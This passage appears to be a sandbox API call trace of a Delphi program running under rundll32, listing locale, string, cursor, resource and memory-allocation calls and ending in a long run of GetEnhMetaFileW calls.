LCType=0x1b, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="0") returned 2 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="0") returned 2 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x1af7a4, cchData=2 | out: lpLCData=",") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x1af7a4, cchData=2 | out: lpLCData=".") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="2") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x1af7a4, cchData=2 | out: lpLCData="/") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0136.557] GetThreadLocale () returned 0x409 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af678, cchData=256 | out: lpLCData="1") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0136.557] GetThreadLocale () returned 0x409 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af678, cchData=256 | out: lpLCData="1") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x1af7a4, cchData=2 | out: lpLCData=":") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="AM") returned 3 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="PM") returned 3 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="0") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="0") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="0") returned 2 [0136.557] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x1af7a4, cchData=2 | out: lpLCData=",") returned 2 [0136.557] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75d60000 [0136.557] GetProcAddress (hModule=0x75d60000, lpProcName="VariantChangeTypeEx") returned 0x75d64c28 [0136.557] GetProcAddress (hModule=0x75d60000, lpProcName="VarNeg") returned 0x75ddc802 [0136.557] GetProcAddress (hModule=0x75d60000, lpProcName="VarNot") returned 0x75ddec66 [0136.557] GetProcAddress (hModule=0x75d60000, lpProcName="VarAdd") returned 0x75d85934 [0136.557] GetProcAddress (hModule=0x75d60000, lpProcName="VarSub") returned 0x75ddd332 [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarMul") returned 0x75dddbd4 [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarDiv") returned 0x75dde405 [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarIdiv") returned 0x75ddf00a [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarMod") returned 0x75ddf15e [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarAnd") returned 0x75d85a98 [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarOr") returned 0x75ddecfa [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarXor") returned 0x75ddee2e [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarCmp") returned 0x75d7b0dc [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarI4FromStr") returned 0x75d76fab [0136.558] GetProcAddress (hModule=0x75d60000, lpProcName="VarR4FromStr") returned 0x75d801a0 [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarR8FromStr") returned 0x75d7699e [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarDateFromStr") returned 0x75d86ba7 [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarCyFromStr") returned 0x75da6c12 [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarBoolFromStr") returned 0x75d7dbd1 [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarBstrFromCy") returned 0x75d87fdc [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarBstrFromDate") returned 0x75d77a2a [0136.559] GetProcAddress (hModule=0x75d60000, lpProcName="VarBstrFromBool") returned 0x75d80355 [0136.559] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x144 [0136.559] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x148 [0136.559] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x14c [0136.559] GetDC (hWnd=0x0) returned 0x3c010257 [0136.560] GetDeviceCaps (hdc=0x3c010257, index=90) returned 96 [0136.560] ReleaseDC (hWnd=0x0, hDC=0x3c010257) returned 1 [0136.560] GetDC (hWnd=0x0) returned 0x3c010257 [0136.560] GetDeviceCaps (hdc=0x3c010257, index=104) returned 0 [0136.560] ReleaseDC (hWnd=0x0, hDC=0x3c010257) returned 1 [0136.560] CreatePalette (plpal=0x1af408) returned 0x2080c42 [0136.560] GetStockObject (i=7) returned 0x1b00017 [0136.560] GetStockObject (i=5) returned 0x1900015 [0136.560] GetStockObject (i=13) returned 0x18a002e [0136.560] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0136.560] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0136.561] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x755e0000 [0136.561] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc112 [0136.561] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc21e [0136.561] GetCurrentThreadId () returned 0xfd0 [0136.561] GlobalAddAtomA (lpString="WndProcPtr0047000000000FD0") returned 0xc14b [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee9, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee8, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee7, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee6, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee5, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee4, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee3, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0136.561] LoadStringA (in: hInstance=0x470000, uID=0xfee2, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfee1, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfee0, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfeff, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfefe, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfefd, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfefc, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfefb, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfefa, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef9, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef8, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef7, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef6, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef5, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef4, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef3, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef2, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef1, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xfef0, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff0f, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff0e, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff0d, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff0c, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff0b, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff0a, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff09, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff08, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff07, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff06, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff05, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff04, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff03, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff02, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0136.562] LoadStringA (in: hInstance=0x470000, uID=0xff01, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0136.563] LoadStringA (in: hInstance=0x470000, uID=0xff00, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0136.563] LoadStringA (in: hInstance=0x470000, uID=0xff1f, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0136.563] LoadStringA (in: hInstance=0x470000, uID=0xff1e, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0136.563] LoadStringA (in: hInstance=0x470000, uID=0xff1d, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0136.563] LoadStringA (in: hInstance=0x470000, uID=0xff1c, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0136.563] LoadStringA (in: hInstance=0x470000, uID=0xff1b, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0136.563] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc21f [0136.563] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc220 [0136.563] GetVersion () returned 0x1db10106 [0136.563] GetCurrentProcessId () returned 0xfcc [0136.563] GlobalAddAtomA (lpString="Delphi00000FCC") returned 0xc14a [0136.563] GetCurrentThreadId () returned 0xfd0 [0136.563] GlobalAddAtomA (lpString="ControlOfs0047000000000FD0") returned 0xc149 [0136.563] RegisterClipboardFormatA (lpszFormat="ControlOfs0047000000000FD0") returned 0xc221 [0136.563] GetProcAddress (hModule=0x755e0000, lpProcName="GetMonitorInfoA") returned 0x75604413 [0136.563] GetProcAddress (hModule=0x755e0000, lpProcName="GetSystemMetrics") returned 0x755f7d2f [0136.563] GetSystemMetrics (nIndex=19) returned 1 [0136.563] GetSystemMetrics (nIndex=75) returned 1 [0136.564] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1ff1150, fWinIni=0x0 | out: pvParam=0x1ff1150) returned 1 [0136.564] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0136.564] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0136.564] LoadCursorA (hInstance=0x470000, lpCursorName=0x7ff9) returned 0x4021d [0136.565] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0136.565] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0136.565] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0136.565] LoadCursorA (hInstance=0x470000, lpCursorName=0x7ffa) returned 0x30281 [0136.565] LoadCursorA (hInstance=0x470000, lpCursorName=0x7ffb) returned 0x3021f [0136.583] LoadCursorA (hInstance=0x470000, lpCursorName=0x7ffc) returned 0x30283 [0136.583] LoadCursorA (hInstance=0x470000, lpCursorName=0x7ffd) returned 0x30221 [0136.583] LoadCursorA (hInstance=0x470000, lpCursorName=0x7fff) returned 0x30285 [0136.584] LoadCursorA (hInstance=0x470000, lpCursorName=0x7ffe) returned 0x3025d [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0136.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0136.584] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0136.584] GetDC (hWnd=0x0) returned 0x3c010257 [0136.584] GetDeviceCaps (hdc=0x3c010257, index=90) returned 96 [0136.584] ReleaseDC (hWnd=0x0, hDC=0x3c010257) returned 1 [0136.584] GetProcAddress (hModule=0x755e0000, lpProcName="EnumDisplayMonitors") returned 0x7560451a [0136.584] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4b7054, dwData=0x1ff139c) returned 1 [0136.585] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x1af767, fWinIni=0x0 | out: pvParam=0x1af767) returned 1 [0136.585] CreateFontIndirectA (lplf=0x1af767) returned 0xb0a0c45 [0136.585] GetObjectA (in: h=0xb0a0c45, c=60, pv=0x1af55c | out: pv=0x1af55c) returned 60 [0136.585] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x1af613, fWinIni=0x0 | out: pvParam=0x1af613) returned 1 [0136.585] CreateFontIndirectA (lplf=0x1af6ef) returned 0xa0a0c43 [0136.585] GetObjectA (in: h=0xa0a0c43, c=60, pv=0x1af55c | out: pv=0x1af55c) returned 60 [0136.586] CreateFontIndirectA (lplf=0x1af6b3) returned 0xa0a0c44 [0136.586] GetObjectA (in: h=0xa0a0c44, c=60, pv=0x1af55c | out: pv=0x1af55c) returned 60 [0136.586] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0136.586] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af6c0, nSize=0x100 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0136.586] OemToCharA (in: pSrc="C:\\Windows\\SysWOW64\\rundll32.exe", pDst=0x1af6c0 | out: pDst="C:\\Windows\\SysWOW64\\rundll32.exe") returned 1 [0136.586] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000 [0136.587] GetKeyboardLayoutList (in: nBuff=64, lpList=0x1af640 | out: lpList=0x1af640) returned 1 [0136.588] GetModuleHandleA (lpModuleName="USER32") returned 0x755e0000 [0136.588] GetProcAddress (hModule=0x755e0000, lpProcName="AnimateWindow") returned 0x7560b531 [0136.588] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x652a0000 [0136.588] GetProcAddress (hModule=0x652a0000, lpProcName="InitializeFlatSB") returned 0x652d266f [0136.588] GetProcAddress (hModule=0x652a0000, lpProcName="UninitializeFlatSB") returned 0x652d2542 [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_GetScrollProp") returned 0x652d1d29 [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_SetScrollProp") returned 0x652d238d [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_EnableScrollBar") returned 0x652d20c9 [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_ShowScrollBar") returned 0x652d1fdb [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_GetScrollRange") returned 0x652d1e8d [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_GetScrollInfo") returned 0x652d1f0f [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_GetScrollPos") returned 0x652d1ccd [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_SetScrollPos") returned 0x652d216d [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_SetScrollInfo") returned 0x652d22be [0136.589] GetProcAddress (hModule=0x652a0000, lpProcName="FlatSB_SetScrollRange") returned 0x652d21e2 [0136.590] GetModuleHandleA (lpModuleName="User32.dll") returned 0x755e0000 [0136.590] GetProcAddress (hModule=0x755e0000, lpProcName="SetLayeredWindowAttributes") returned 0x7561ec88 [0136.590] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff3f, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff3e, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff3d, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff3c, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff3b, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff3a, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff39, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff38, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff37, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff36, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff35, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff34, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff33, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff32, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff31, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff30, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff4f, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0136.590] LoadStringA (in: hInstance=0x470000, uID=0xff4e, lpBuffer=0x1af404, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0136.591] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x759c0000 [0136.591] GetProcAddress (hModule=0x759c0000, lpProcName="CoCreateInstanceEx") returned 0x75a09d4e [0136.591] GetProcAddress (hModule=0x759c0000, lpProcName="CoInitializeEx") returned 0x75a009ad [0136.591] GetProcAddress (hModule=0x759c0000, lpProcName="CoAddRefServerProcess") returned 0x75a23cf3 [0136.591] GetProcAddress (hModule=0x759c0000, lpProcName="CoReleaseServerProcess") returned 0x75a24314 [0136.591] GetProcAddress (hModule=0x759c0000, lpProcName="CoResumeClassObjects") returned 0x759cea02 [0136.591] GetProcAddress (hModule=0x759c0000, lpProcName="CoSuspendClassObjects") returned 0x75a2bb02 [0136.592] FindResourceA (hModule=0x470000, lpName="gyy", lpType=0x1205) returned 0x514f48 [0136.592] LoadResource (hModule=0x470000, hResInfo=0x514f48) returned 0x51c64c [0136.592] SizeofResource (hModule=0x470000, hResInfo=0x514f48) returned 0x7804 [0136.592] LockResource (hResData=0x51c64c) returned 0x51c64c [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.592] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.593] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] 